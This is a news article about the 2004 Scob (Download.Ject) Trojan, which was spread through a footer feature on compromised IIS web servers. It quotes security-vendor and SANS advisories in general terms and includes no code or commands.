Visitors to a number of Websites, primarily through Microsoft Internet Explorer, are getting something they didn't need: an infection called Scob that causes them to unwittingly pick up programs like Trojan horses and other malware which hackers can use to plant other backdoors that steal sensitive data from their computers.
The affected Websites have not been disclosed at this writing. "We won't list the sites that are reported to be infected in order to prevent further abuse," said an announcement from the Internet Storm Center at the SANS Institute, a collaborative between universities and private researchers, "but the list is long and includes businesses that we presume would normally be keeping their sites fully patched."
This is different than viruses spreading by e-mail, security experts said within hours of the bugs' appearance June 25. They say all you have to do is visit an infected Website – which you won't really know is infected – that runs Microsoft's IIS 5.0 program for Web servers, and you could pick up a Trojan horse that could put anything from a keystroke logger or a proxy server to other back door bugs, giving the hackers full access to your system.
Security firm Sophos said early June 25 that Microsoft Internet Explorer users who visit pages infected by the bug might find their computers trying to download a file from an as-yet unidentified Russian Website. Microsoft has issued a critical alert and is pressing Windows users to download protection updates at once.
The Internet Storm Center said the affected Websites might have been compromised for this bug earlier this week.
"If a user visited an infected site," SANS said, "the Javascript delivered by the site would instruct the user's browser to download an executable from a Russian web site and install it. Different executables were observed. These Trojan horse programs include keystroke loggers, proxy servers and other back doors providing full access to the infected system."
"We are investigating a case called 'RFI - Russian IIS Hacks?' by Sans.org," said the security response team of antivirus/security product maker F-Secure early June 25. "Some of the files at the hacked sites have been modified – a Trojan downloader known as Scob has been appended to end of the files, causing Internet Explorer to execute it."
F-Secure said Scob was discovered in earnest "from a number of Websites" late June 24. "The Trojan has been found to be appended to existing files at those web servers, for example pictures such as jpeg files," said a company advisory. "According to reports, the script has not been appeded by modifying the actual files on the server but using the so called footer feature from Microsoft's Internet Information Server.
"When executed, the Trojan attempts to use an invisible frame to connect to a page at a remote Website," the advisory continued. "At the time of writing, the page in the Website is not available.
F-Secure also believes Scob's downloader has been used to install variants of the Padolor backdoor, which was the brainchild of the Russian hacking group HangUp Team and which steals sensitive personal information including credit, logins, passwords, and other sensitive data. A variant known as Padolor.w was found early June 25, as Scob began hitting the Web in earnest.
While Scob is not the first Trojan ever to be attached to a Website, SANS said that what made Scob so alarming was because it affects a large number of servers and can't yet be detected as easily as earlier Trojans had been.
Scob is also known as Download.Ject or Toofer, according to Sophos.
"JS.Scob.Trojan is a simple Trojan that executes a JavaScript file from a remote server," said an advisory from Symantec, the makers of Norton Antivirus. "The Trojan's dropper sets it as the document footer for all pages served by IIS Web sites on the infected computer."
Symantec said Scob does not seem to affect DOS, Linux, Macintosh, Macintosh OS X, Novell Netware, OS/2, UNIX, or Windows 3.x systems.
"Users should be aware that any Website, even those that may be trusted by the user, may be affected by this activity and thus contain potentially malicious code," said the federal government-directed Computer Emergency Readiness Team, in a warning they posted late June 24, when indications of Scob were first reported.
For further information, you should visit the Website of the company that makes your antivirus/computer security software package, including Symantec (Norton), F-Secure, and Sophos. You can also visit Microsoft's Website to get the latest information on Scob and, if need be, download appropriate updates for your Windows system.
